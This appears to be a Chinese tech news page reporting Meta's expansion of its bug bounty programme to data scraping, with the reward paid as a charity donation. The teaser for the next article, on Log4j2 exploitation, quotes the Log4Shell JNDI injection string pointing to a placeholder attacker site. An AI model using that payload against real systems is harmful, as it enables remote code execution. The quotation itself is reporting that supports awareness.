Meta扩大漏洞悬赏计划 首次纳入数据搜刮类目
WOT全球技术创新大会2022,门票6折抢购中!购票立减2320元!
Meta 正在扩大它的漏洞悬赏计划,将报告数据抓取的研究人员纳入其中。这一变化将允许研究人员报告能够进行抓取活动的漏洞,以及之前抓取的已经在网上发布的数据。Meta 在一篇博文中表示,公司应该是业内首个专门针对抓取活动启动悬赏的公司。
安全工程经理 Dan Gurfinkle 在一次简报会上表示:“我们正在寻找那些能使攻击者绕过抓取限制的漏洞,从而获取到超出预期的数据”。和追踪其他“恶意”活动不同,数据搜刮是使用自动化工具从用户的个人资料中大量收集个人信息,如电子邮件地址、电话号码、个人资料照片和其他细节。尽管用户通常愿意在他们公开的 Facebook 档案中分享这些信息,但搜刮者可以更广泛地暴露这些细节,比如在可搜索的数据库中公布这些信息。
Meta 公司也很难打击这种活动。例如,4 月份,超过 5 亿 Facebook 用户的个人信息被公布在一个论坛上。在这种情况下,实际的数据搜刮发生在几年前,而且公司已经解决了潜在的缺陷。但是,一旦数据开始在网上流传,它就无能为力了。在某些情况下,该公司也曾起诉个人的数据窃取行为。
根据新的漏洞赏金计划,研究人员如果找到“未受保护或公开的数据库,其中包含至少10万条具有PII(个人身份信息)或敏感数据(如电子邮件、电话号码、物理地址、宗教或政治派别)的独特Facebook用户记录,将获得奖励”。不过,Meta 公司表示,它将向研究人员选择的慈善机构捐款,而不是像往常一样进行赔付,以避免激励发布刮削数据的行为。

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
携号转网体验报告:流程和风险统统告诉你
WOT全球技术创新大会2022,门票6折抢购中!购票立减2320元! 本文具有时间局限性、区域局限性,撰写文章时间为2021年12月,因为时间或者地区的关系,携号转网相关程序、 手续、流程如产生改动,恕不通知,敬请谅解。 前情(为什么要转网): 部分号码来电接听后无法通话(双方无声) 换手机可复现(排除手机原因) 换地址可复现(排除基站原因) 换SIM卡可复现(花费5元,排除SIM卡原因) 联通线上线下客服无解决方案 联通后台表示我的通话状况正常 发现该问题已经3天的时候和联通提出携号转网,联通线上客服的话术竟然说“没出现多长时间”,挽留话术中有“给你100+元话费”“月费打折”等,不痛不痒 —— 我要的是解决问题,你们解决不了我就转网,这些话术建议省省。 在这里需要感谢工信部让普通用户拥有携号转网的权利,换做以前为了保号只能默默忍受某些运营商令人作呕的服务,现在虽然可选择依旧不多,但至少有了一定的选择权。 注意事项: 1、违约金 三大运营商偶尔都会提供一些“充XX元送YY元”“话费XX折”活动,其中YY元一般都是分几个月甚至是几个月赠送,这种福利实际上就是换你的在网时间,防止用户流失...
- 下一篇
微软警告比SolarWinds影响更深远的Log4j2漏洞利用
WOT全球技术创新大会2022,门票6折抢购中!购票立减2320元! 微软再次发出了来自具有深厚背景的黑客组织的网络攻击预警,可知问题源于 Java 日志库的 Log4j2 漏洞(CVE-2021-44228)。这家雷德蒙德科技巨头指出,世界多地的黑客已开始利用这项更复杂的日志协议技术,来远程访问受害者的设备。目前观察到的大部分攻击,主要涉及各路人马的大规模扫描。 据悉,微软旗下的多个威胁情报团队 —— 包括 MSTIC 威胁情报中心、 Microsoft 365 Defender 威胁情报团队、RiskIQ 和 DART 检测响应团队 —— 一直在密切关注 Apache Log4j2 的远程代码执行(RCE)漏洞。 CVE-2021-44228 漏洞披露公告指出,被称作“Log4Shell”的漏洞攻击,往往在 Web 日志请求中包含如下字符串: ${jndi:ldap://[attackersite]/a} 美国网络安全和基础设施安全局(CISA)也证实了微软的说法,此前该机构同样通报了 Log4Shell 漏洞的广泛利用。 CISA 负责人 Jen Easterly 于昨日接受 C...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- CentOS7安装Docker,走上虚拟化容器引擎之路
- Eclipse初始化配置,告别卡顿、闪退、编译时间过长
- Windows10,CentOS7,CentOS8安装Nodejs环境
- CentOS7,8上快速安装Gitea,搭建Git服务器
- Docker快速安装Oracle11G,搭建oracle11g学习环境
- CentOS6,7,8上安装Nginx,支持https2.0的开启
- CentOS6,CentOS7官方镜像安装Oracle11G
- SpringBoot2整合MyBatis,连接MySql数据库做增删改查操作
- Docker安装Oracle12C,快速搭建Oracle学习环境
- SpringBoot2编写第一个Controller,响应你的http请求并返回结果